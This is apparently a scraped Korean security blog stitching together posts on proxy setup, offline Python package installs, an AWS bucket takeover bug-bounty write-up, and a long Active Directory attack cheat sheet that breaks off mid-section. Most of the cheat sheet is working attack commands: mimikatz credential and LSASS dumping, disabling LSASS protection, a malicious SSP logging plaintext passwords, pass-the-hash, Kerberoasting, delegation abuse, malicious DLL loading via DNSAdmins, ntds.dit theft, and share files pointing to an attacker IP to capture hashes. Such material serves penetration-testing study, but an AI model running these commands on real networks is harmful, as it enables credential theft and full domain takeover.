Fiddler 내부망
Options > HTTPS > Decrypt
Conntection 8888 확인 > 브라우저 127.0.0.1 > 인증서 설치
Gateway > Manual Proxy Config > 127.0.0.1:8080 (Burp 포트 넘버)
캡처링 (F12) 체크한 뒤 Burp 통해서 패킷을 받아 봄
| /.vscode/sftp.json (0) | 2023.11.19 |
|---|---|
| Active Directory Basic 문제 (0) | 2023.11.12 |
| VDI python Package 설치 (0) | 2023.11.08 |
| Information Disclosure via Misconfigured AWS to AWS Bucket Takeover (0) | 2023.11.06 |
| Hacking Swagger-UI - from XSS to account takeovers (0) | 2023.11.02 |
wtdsoul
오프라인 상태에서 패키지를 설치하기?
이직한 곳에서는 보안 상의 이유로 VDI(Virtual Desktop Infra) 라는 것을 사용하는데, 나는 처음 접해보는 것이다보니 아직 익숙하지 않다. 모든 사내 데이터는 원칙적으로 VDI 내부에서만 존재하고, 허
seonu-lim.github.io
이직한 곳에서는 보안 상의 이유로 VDI(Virtual Desktop Infra) 라는 것을 사용하는데, 나는 처음 접해보는 것이다보니 아직 익숙하지 않다. 모든 사내 데이터는 원칙적으로 VDI 내부에서만 존재하고, 허가를 받아야 데이터의 반출이 가능하다. 사내 메신저나 메일도 VDI 안에서만 확인이 가능하다… 게다가 인터넷은 회사 홈페이지를 제외하고는 연결이 되지 않는다!
이렇게 폐쇄적인 환경이다보니, 개발이나 분석 툴로써 파이썬을 사용할 때에도 어려움이 따른다. 패키지들을 설치하려면 보통은 pip 이나 conda 를 사용하는데 인터넷 연결이 되지 않으니 패키지를 다운받는 게 정말 번거로운 일이 된다. 설상가상으로 나는 지금 회사에서 파이썬 교육 업무를 맡고 있어서, 아무것도 모르는 사람들이 VDI 에 패키지를 설치할 수 있도록 만들어주어야 한다. 따라서 최대한 간소한 방법을 서술하도록 하겠다.
우선 VDI 를 접속하는 로컬 컴퓨터는 몇몇 사이트를 제외하고 인터넷 연결이 되기 때문에 우선 로컬에서 원하는 패키지를 인스톨한다. 단, 우리 회사 인터넷망에서는 그냥 pip install foo 하면, 뭔 ssl certificate 이 어쩌구 하면서 에러가 난다. 그러므로 다음과 같이 argument를 더해주도록 한다.
pip --trusted-host pypi.org --trusted-host files.pythonhosted.org install foo
이렇게 다운받고 나서, 폴더를 하나 만들어서 shell 을 켜고 그곳으로 이동한다. 그리고 다음과 같이 다운로드 해준다.
pip --trusted-host pypi.org --trusted-host files.pythonhosted.org download foo
폴더에 foo 파일과 그의 dependency들도 같이 다운로드되어있을 것이다. 이것을 파일 전송 시스템으로 VDI 로 옮겨준다. VDI 에는 python만 깔려있다고 가정한다. 이제 파일 전송 시스템에서 받아온 파일들을 특정 경로에 저장해주고 shell 을 켠다.
python -m pip install --no-index -f . foo
오류가 난다면, whl 파일을 다운받았던 파이썬 버전과 패키지 인스톨하고자 하는 파이썬 버전이 다르지 않은지 확인해보자.
| Active Directory Basic 문제 (0) | 2023.11.12 |
|---|---|
| Fiddler 셋팅 (0) | 2023.11.10 |
| Information Disclosure via Misconfigured AWS to AWS Bucket Takeover (0) | 2023.11.06 |
| Hacking Swagger-UI - from XSS to account takeovers (0) | 2023.11.02 |
| Active Directory 정보 수집 (0) | 2023.10.25 |
wtdsoul
Information Disclosure via Misconfigured AWS to AWS Bucket Takeover
Hey! Welcome to a new write up on my recent finding of a Misconfigured AWS bucket and how i was able to Take full control of the AWS…
medium.com
Information Disclosure via Misconfigured AWS to AWS Bucket Takeover
Hey! Welcome to a new write up on my recent finding of a Misconfigured AWS bucket and how i was able to Take full control of the AWS bucket.
I was checking out the website mainly for the IDOR Vulnerabilities as those are considered as High priority bugs and are paid in high range. I was trying to check every possible end-points to find any parameter to manipulate the numerical value so i fired up my burp suite and sent the request to spider tab to check out all the endpoints but i failed because they have encrypted every numerical value using salted algorithm.
As it was not possible to find any IDOR , i found an interesting endpoint where i was able to set my organization logo and there was a direct link to the logo which was residing at an AWS bucket. You can check below:
So i checked this logo by directly coping it and opening it in the new tab:
Basically i never though that i will find anything like this so i never thought of doing anything in any programs or private programs i have worked on but that day i thought that let’s go to origin directory of the file[in hacker’s language ../ ;)]. so i checked it by going to the origin directory as you can see:
Bingo! this was a proper Information disclosure due to Misconfigured ACL of the AWS bucket. I was happy and thought of reporting this directly but as a Hacker you are always overwhelmed and curious to find all the juicy information that might be possible to exploit. So without wasting any time , I went ahead to check out all the files getting listed in the Directory but before that i tried to access one of the file to check if the files are real or not.
Than i opened the file to see what is the content:
Now i am confident enough that all the files available here are legitimate[Use of sophisticated word to look geeky 🤓] and we can see all the internal files of the xyz company here with small tutorials , screenshot and this was an internal S3 bucket used for training and demonstration purposes, such as sharing screenshots of their products……I guess so now you can see why it’s Critical.
At that moment , I felt like it’s enough to report now but i took a chance and thought if there is something else the bucket is offering to compromise itself…Damn Is it possible? Let’s see what happens…. I started checking files with extensions, especially with .zip or .htm or .eml or .doc or .csv and while searching through the entire bucket[which consisted of more than 700+ files] and found the first zip file:
So i downloaded it and checked the contents:
After checking on the files of that zip , i figured out that it’s not going to offer me anything to compromise the AWS bucket. So i started searching for other zip files and found an interesting zip file in the AWS bucket:
Now i downloaded the file and opened to check the contents:
I checked all the files but the important file was the “document.wflow” , It has everything i required to TAKEOVER the AWS Bucket. Let’s check the content:
I was so happy to see this credentials but now the funny thing is that i don’t know what to do with that because Zero knowledge in AWS. So the best way i found was i asked one of my office colleague who is a Dev and works on AWS. He told me that , Go to google and download S3 Browser to start browsing the AWS bucket if you have the “access_key” and “secret_key” which was a very new learning experience in the field of my Web Application Penetration Testing. I was like:
So i downloaded it and started providing all the required credentials:
Boom!
The next thing i checked on the Access Control List permission on each directory and found a directory with full access:
With the full access to this directory now I am the Owner of this and i can upload any file i want , I can delete it and i can Delete the whole directory. I had all the access in the world but As you all know we are all ethical in what we do so to make a Proof Of Concept i uploaded a file:
Now to re-verify it I checked it in the public facing bucket with my uploaded file name.
Final check I pasted the filename in the URL and checked:
Damn! AWS Bucket Takeover!
Following my initial report and its review, they had promptly and fairly compensated me for letting them know about this bug. I am really thankful for that :)
| Fiddler 셋팅 (0) | 2023.11.10 |
|---|---|
| VDI python Package 설치 (0) | 2023.11.08 |
| Hacking Swagger-UI - from XSS to account takeovers (0) | 2023.11.02 |
| Active Directory 정보 수집 (0) | 2023.10.25 |
| Active Directory Pentesting Resources (1) | 2023.10.25 |
wtdsoul
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
Hacking Swagger-UI - from XSS to account takeovers
We have reported more than 60 instances of this bug across a wide range of bug bounty programs including companies like Paypal, Atlassian, Microsoft, GitLab, Yahoo, ...
blog.vidocsecurity.com
| VDI python Package 설치 (0) | 2023.11.08 |
|---|---|
| Information Disclosure via Misconfigured AWS to AWS Bucket Takeover (0) | 2023.11.06 |
| Active Directory 정보 수집 (0) | 2023.10.25 |
| Active Directory Pentesting Resources (1) | 2023.10.25 |
| Active Directory Attack List (1) | 2023.10.18 |
wtdsoul
https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
Penetration Testing Active Directory, Part I
I’ve had several customers come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical vulnerabilities and that they’…
hausec.com
https://theredteamlabs.com/active-directory-penetration-testing/
Active Directory Penetration Testing and Lab Setup - RedTeam
I had several clients come to me before a pentest and say they think they’re in a good shape because their vulnerability scan shows no critical
theredteamlabs.com
| Information Disclosure via Misconfigured AWS to AWS Bucket Takeover (0) | 2023.11.06 |
|---|---|
| Hacking Swagger-UI - from XSS to account takeovers (0) | 2023.11.02 |
| Active Directory Pentesting Resources (1) | 2023.10.25 |
| Active Directory Attack List (1) | 2023.10.18 |
| iOS Application Pentest with me.. (Part- 1) (1) | 2023.10.17 |
wtdsoul
https://bhavsec.com/posts/active-directory-resources/
This post contains Active Directory Pentesting resources to prepare for new OSCP (2022) exam.
Active Directory madness and the Esoteric Cult of Domain Admin! - alh4zr3d
TryHackMe - Advent of Cyber + Active Directory - tib3rius
Common Active Directory Attacks: Back to the Basics of Security Practices - TrustedSec
How to build an Active Directory Lab - The Cyber Mentor
Zero to Hero (Episode 8,9,10) - The Cyber Mentor
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch
https://medium.com/@Dmitriy_Area51/active-directory-penetration-testing-d9180bff24a1
https://book.hacktricks.xyz/windows/active-directory-methodology
https://zer1t0.gitlab.io/posts/attacking_ad/
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://infosecwriteups.com/active-directory-penetration-testing-cheatsheet-5f45aa5b44ff
Active Directory Basics - Easy
Post-Exploitation Basics - Easy
Vulnnet Roasted - Easy
Attacktive Directory - Medium
raz0r black - Medium
Enterprise - Medium
Vulnnet Active - Medium
Zero Logon - Hard
Holo - Hard
Throwback - Easy
Forest - Easy
Active - Easy
Fuse - Medium
Cascade - Medium
Monteverde - Medium
Resolute - Medium
Arkham - Medium
Mantis - Hard
APT - Insane
Dante - Beginner
Offshore - Intermediate
RastaLabs - Intermediate
Cybernetics - Advanced
APT Labs - Advanced
ActiveDirectory LDAP - Medium
ActiveDirectory Powerview - Medium
ActiveDirectory BloodHound - Medium
OSCP - Offensive Security Certified Professional - Offsec - Intermediate
CRTP - Certified Red Team Professional - Pentester Academy - Beginner
CRTE - Certified Red Team Expert - Pentester Academy - Expert
CRTO - Certified Red Team Operator - Zeropoint Security - Intermediate
Practical Ethical Hacking - TCM Security
Active Directory Pentesting Full Course - Red Team Hacking
Red Team Ethical Hacking - Beginner
Red Team Ethical Hacking - Intermediate
Hutch, Heist & Vault
| Hacking Swagger-UI - from XSS to account takeovers (0) | 2023.11.02 |
|---|---|
| Active Directory 정보 수집 (0) | 2023.10.25 |
| Active Directory Attack List (1) | 2023.10.18 |
| iOS Application Pentest with me.. (Part- 1) (1) | 2023.10.17 |
| 60 Methods For Cloud Attacks (0) | 2023.10.16 |
wtdsoul
https://github.com/geeksniper/active-directory-pentest
GitHub - geeksniper/active-directory-pentest
Contribute to geeksniper/active-directory-pentest development by creating an account on GitHub.
github.com
https://github.com/geeksniper/active-directory-pentest
GitHub - geeksniper/active-directory-pentest
Contribute to geeksniper/active-directory-pentest development by creating an account on GitHub.
github.com
This cheat sheet contains common enumeration and attack methods for Windows Active Directory.
This cheat sheet is inspired by the PayloadAllTheThings repo.
Get-DomainPolicy
#Will show us the policy configurations of the Domain about system access or kerberos
Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicyGet-DomainController
Get-DomainController -Domain <DomainName>#Save all Domain Users to a file
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
#Will return specific properties of a specific user
Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
#Enumerate user logged on a machine
Get-NetLoggedon -ComputerName <ComputerName>
#Enumerate Session Information for a machine
Get-NetSession -ComputerName <ComputerName>
#Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromNameGet-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
#Enumerate Live machines
Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName#Save all Domain Groups to a file:
Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt
#Return members of Specific Group (eg. Domain Admins & Enterprise Admins)
Get-DomainGroup -Identity '<GroupName>' | Select-Object -ExpandProperty Member
Get-DomainGroupMember -Identity '<GroupName>' | Select-Object MemberDistinguishedName
#Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine
Get-NetLocalGroup | Select-Object GroupName
#Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
#Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
#Enumerate "Interesting" Files on accessible shares
Find-InterestingDomainShareFile -Include *passwords*Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
#Enumerate all GPOs to a specific computer
Get-DomainGPO -ComputerIdentity <ComputerName> -Properties DisplayName | Sort-Object -Property DisplayName
#Get users that are part of a Machine's local Admin group
Get-DomainGPOComputerLocalGroupMapping -ComputerName <ComputerName>Get-DomainOU -Properties Name | Sort-Object -Property Name# Returns the ACLs associated with the specified account
Get-DomaiObjectAcl -Identity <AccountName> -ResolveGUIDs
#Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"Get-DomainTrust
Get-DomainTrust -Domain <DomainName>
#Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
Get-DomainTrustMappingGet-ForestDomain
Get-ForestDomain -Forest <ForestName>
#Map the Trust of the Forest
Get-ForestTrust
Get-ForestTrust -Forest <ForestName>#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain
Find-DomainLocalGroupMember -Verbose
#Find computers were a Domain Admin OR a spesified user has a session
Find-DomainUserLocation | Select-Object UserName, SessionFromName
#Confirming admin access
Test-AdminAccessGet-ADDomainController
Get-ADDomainController -Identity <DomainName>Get-ADUser -Filter * -Identity <user> -Properties *
#Get a spesific "string" on a user's attribute
Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, DescriptionGet-ADComputer -Filter * -Properties *
Get-ADGroup -Filter *Get-ADTrust -Filter *
Get-ADTrust -Identity <DomainName>Get-ADForest
Get-ADForest -Identity <ForestName>
#Domains of Forest Enumeration
(Get-ADForest).DomainsGet-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionsPython BloodHound Repository or install it with pip3 install bloodhound
bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All#Using exe ingestor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>
#Using PowerShell module ingestor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile># kali linux:
./adalanche collect activedirectory --domain <Domain> \
--username <Username@Domain> --password <Password> \
--server <DC>
# Example:
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb
## -> Terminating successfully
## Any error?:
# LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ?
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389
# Invalid Credentials ?
./adalanche collect activedirectory --domain windcorp.local \
--username spoNge369@windcorp.local --password 'password123!' \
--server dc.windcorp.htb --tlsmode NoTLS --port 389 \
--authmode basic
# Analyze data
# go to web browser -> 127.0.0.1:8080
./adalanche analyze#Enable PowerShell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting
#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name> OR -Sessions <SessionName>$SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}#Execute the command and start a session
Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1 -Session $sess
#Interact with the session
Enter-PSSession -Session $sess
#Create a new session
$sess = New-PSSession -ComputerName <NameOfComputer>
#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}
#Check the result of the command to confirm we have an interactive session
Invoke-Command -Session $sess -ScriptBlock {$ps}#The commands are in cobalt strike format!
#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords
#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>
#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets
#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg
#Dump and save LSASS in a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp
#List cached MasterKeys
mimikatz sekurlsa::dpapi
#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys
#Dump SAM Database
mimikatz lsadump::sam
#Dump SECRETS Database
mimikatz lsadump::secrets
#Inject and dump the Domain Controler's Credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject
#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all
#List and Dump local kerberos credentials
mimikatz kerberos::list /dump
#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>
#List TS/RDP sessions
mimikatz ts::sessions
#List Vault credentials
mimikatz vault::list❗ What if mimikatz fails to dump credentials because of LSA Protection controls ?
#Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
#Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
#Now lets import the mimidriver.sys to the system
mimikatz # !+
#Now lets remove the protection flags from lsass.exe process
mimikatz # !processprotect /process:lsass.exe /remove
#Finally run the logonpasswords function to dump lsass
mimikatz # sekurlsa::logonpasswords#Check if a process called lsaiso.exe exists on the running processes
tasklist |findstr lsaiso
#If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
#Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
mimikatz # misc::memssp
#Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.logIf the host we want to lateral move to has "RestrictedAdmin" enabled, we can pass the hash using the RDP protocol and get an interactive session without the plaintext password.
#We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag
privilege::debug
sekurlsa::pth /user:<Username> /domain:<DomainName> /ntlm:<NTLMHash> /run:"mstsc.exe /restrictedadmin"
#Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonatedxfreerdp +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8 /u:<Username> /pth:<NTLMHash> /v:<Hostname | IPAddress>❗ If Restricted Admin mode is disabled on the remote machine we can connect on the host using another tool/protocol like psexec or winrm and enable it by creating the following registry key and setting it's value zero: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".
[InternetShortcut]
URL=file://<AttackersIp>/leak/leak.html
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\<AttackersIp>\%USERNAME%.icon
IconIndex=1
[Shell]
Command=2
IconFile=\\<AttackersIp>\Share\test.ico
[Taskbar]
Command=ToggleDesktop
Putting these files in a writeable share the victim only has to open the file explorer and navigate to the share. Note that the file doesn't need to be opened or the user to interact with it, but it must be on the top of the file system or just visible in the windows explorer window in order to be rendered. Use responder to capture the hashes.
❗ .scf file attacks won't work on the latest versions of Windows.
WUT IS DIS?:
All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user"
account, extract the encrypted blob that was encrypted using the user's password and bruteforce it offline.
#Get User Accounts that are used as Service Accounts
Get-NetUser -SPN
#Get every available SPN account, request a TGS and dump its hash
Invoke-Kerberoast
#Requesting the TGS for a single account:
Request-SPNTicket
#Export all tickets using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'#Get User Accounts that are used as Service Accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalNamepython GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName>#Kerberoasting and outputing on a file with a spesific format
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName>
#Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /rc4opsec
#Kerberoast AES enabled accounts
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /aes
#Kerberoast spesific user account
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /user:<username> /simple
#Kerberoast by specifying the authentication credentials
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /creduser:<username> /credpassword:<password>WUT IS DIS?:
If a domain user account do not require kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encrypted
blob and bruteforce it offline.
Forcefully Disable Kerberos Preauth on an account i have Write Permissions or more! Check for interesting permissions on accounts:
Hint: We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!
PowerView:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
Disable Kerberos Preauth:
Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose
Check if the value changed:
Get-DomainUser -PreauthNotRequired -Verbose#Get a spesific Accounts hash:
Get-ASREPHash -UserName <UserName> -Verbose
#Get any ASREPRoastable Users hashes:
Invoke-ASREPRoast -Verbose#Trying the attack for all domain users
Rubeus.exe asreproast /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
#ASREPRoast spesific user
Rubeus.exe asreproast /user:<username> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
#ASREPRoast users of a spesific OU (Organization Unit)
Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>#Trying the attack for the specified users on the file
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName>If we have harvest some passwords by compromising a user account, we can use this method to try and exploit password reuse on other domain accounts.
Tools:
WUT IS DIS ?: If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its blob and bruteforce it.
#Check for interesting permissions on accounts:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
#Check if current user has already an SPN setted:
Get-DomainUser -Identity <UserName> | select serviceprincipalname
#Force set the SPN on the account:
Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}#Check if current user has already an SPN setted
Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName
#Force set the SPN on the account:
Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}Finally use any tool from before to grab the hash and kerberoast it!
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Domain Escalation.
#List shadow copies using vssadmin (Needs Admnistrator Access)
vssadmin list shadows
#List shadow copies using diskshadow
diskshadow list shadows all
#Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Usually encrypted credentials are stored in:
#By using the cred function of mimikatz we can enumerate the cred object and get information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
#From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
#Lets enumerate the Master Key:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"
#Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc
#We now have the masterkey in our local cache:
dpapi::cache
#Finally we can decrypt the credential using the cached masterkey:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"Detailed Article: DPAPI all the things
WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high value target or DA to connect to it, steal his TGT then ptt and impersonate him!
Using PowerView:
#Discover domain joined computers that have Unconstrained Delegation enabled
Get-NetComputer -UnConstrained
#List tickets and check if a DA or some High Value target has stored its TGT
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
#Command to monitor any incoming sessions on our compromised server
Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay
<WaitInterval> -Verbose
#Dump the tickets to disk:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
#Impersonate the user using ptt attack:
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"'Note: We can also use Rubeus!
Using PowerView and Kekeo:
#Enumerate Users and Computers with constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>
#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>
#Finally use mimikatz to ptt the TGS
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'ALTERNATIVE: Using Rubeus:
Rubeus.exe s4u /user:<UserName> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<UserToImpersonate> /msdsspn:"<Service's SPN>" /altservice:<Optional> /pttNow we can access the service as the impersonated user!
🚩 What if we have delegation rights for only a spesific SPN? (e.g TIME):
In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. Thats gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
WUT IS DIS?:
TL;DR
If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access.
Tools we are going to use:
First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid
#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'
#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt
#Finally we can access the C$ drive of the target machine
dir \\TargetMachine.wtver.domain\C$Detailed Articles:
❗ In Constrain and Resource-Based Constrained Delegation if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from rubeus and fool Kerberos to give us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack.
#Command on Rubeus
Rubeus.exe tgtdeleg /nowrapDetailed Article: Rubeus – Now With More Kekeo
WUT IS DIS ?: If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work.
#Using dnscmd:
dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
#Restart the DNS Service:
sc \\DNSServer stop dns
sc \\DNSServer start dnsWUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.
#Create a .txt file that will contain the shadow copy process script
Script ->{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
}
#Execute diskshadow with our script as parameter
diskshadow /s script.txt#Importing both dlls from the repo using powershell
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
#Checking if the SeBackupPrivilege is enabled
Get-SeBackupPrivilege
#If it isn't we enable it
Set-SeBackupPrivilege
#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite
#Dump the SYSTEM hive
reg save HKLM\SYSTEM c:\temp\system.hiveWUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain Administrator of the root domain of the forest. This is possible because of the SID History field on a kerberos TGT ticket, that defines the "extra" security groups and privileges.
Exploitation example:
#Get the SID of the Current Domain using PowerView
Get-DomainSID -Domain current.root.domain.local
#Get the SID of the Root Domain using PowerView
Get-DomainSID -Domain root.domain.local
#Create the Enteprise Admins SID
Format: RootDomainSID-519
